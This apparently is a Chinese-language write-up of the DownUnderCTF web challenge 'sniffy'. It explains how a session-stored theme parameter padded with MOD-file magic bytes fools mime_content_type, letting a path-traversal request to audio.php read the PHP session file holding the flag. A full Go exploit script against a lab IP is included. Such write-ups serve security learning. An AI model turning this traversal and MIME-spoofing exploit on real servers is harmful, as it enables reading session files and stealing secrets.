DownUnderCTF web sniffy

题目中给了源码

index.php中将flag的值赋给了session['flag']

session['theme']接收GET传入的theme参数。。。??是PHP中的空合并运算符它的作用是检查左侧的值是否存在且不为null。如果存在,则返回左侧的值;如果不存在,则返回右侧的值。

如果theme以GET的方式传入了值。则$_SESSION['theme']将使用传入的值

audio.php中存在文件读取。但是会判断文件的mine类型是否为audio

mime_content_type函数以magic.mime文件中的信息来确定mime

我们传入的theme值将会在/tmp/sess_xxx文件的中间出现。我们可传入便宜量较大的字符串来更改文件的mime

例如:M.K.M!K!FLT4FLT8这些便宜量较大的值(1080)

同时不知道flag占据了多少了个字节。可以进行4个循环在每个循环中添加一个字符来进行破解

这里是我用exp

Golang 复制代码
package main

import (
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
)

func main() {
	target := "http://192.168.22.129:1880"
	target2 := "http://192.168.22.129:1880/audio.php"
	//target := "https://httpbin.org/get"
	Client := http.Client{}

	for i := 0; i < 4; i++ {
		req1, err := http.NewRequest("GET", target, nil)
		if err != nil {
			fmt.Println(err)
		}
		param := make(url.Values)
		param.Add("theme", strings.Repeat("s", i)+strings.Repeat("4CHN", 270))
		req1.URL.RawQuery = param.Encode()
		req1.Header.Add("Cookie", "PHPSESSID=yex")
		do, err := Client.Do(req1)
		if err != nil {
			fmt.Println(err)
		}
		defer do.Body.Close()
		_, err = ioutil.ReadAll(do.Body)

		req2, err := http.NewRequest("GET", target2, nil)
		param2 := make(url.Values)
		param2.Add("f", "../../../../../../../tmp/sess_yex")
		req2.URL.RawQuery = param2.Encode()
		do2, _ := Client.Do(req2)
		defer do2.Body.Close()
		data2, _ := io.ReadAll(do2.Body)

		if do2.StatusCode != 403 {

			fmt.Println(string(data2))
		}
	}

}
相关推荐
lmryBC491 天前
golang接口-interface
java·前端·golang
浮尘笔记1 天前
go-zero使用elasticsearch踩坑记:时间存储和展示问题
大数据·elasticsearch·golang·go
冷琅辞1 天前
Go语言的嵌入式网络
开发语言·后端·golang
徐小黑ACG1 天前
GO语言 使用protobuf
开发语言·后端·golang·protobuf
能来帮帮蒟蒻吗2 天前
GO语言学习(16)Gin后端框架
开发语言·笔记·学习·golang·gin
JavaPub-rodert2 天前
一道go面试题
开发语言·后端·golang
6<72 天前
【go】静态类型与动态类型
开发语言·后端·golang
weixin_420947642 天前
windows golang,consul,grpc学习
windows·golang·consul
Json20113152 天前
Gin、Echo 和 Beego三个 Go 语言 Web 框架的核心区别及各自的优缺点分析,结合其设计目标、功能特性与适用场景
前端·golang·gin·beego
二狗哈2 天前
go游戏后端开发21:处理nats消息
开发语言·游戏·golang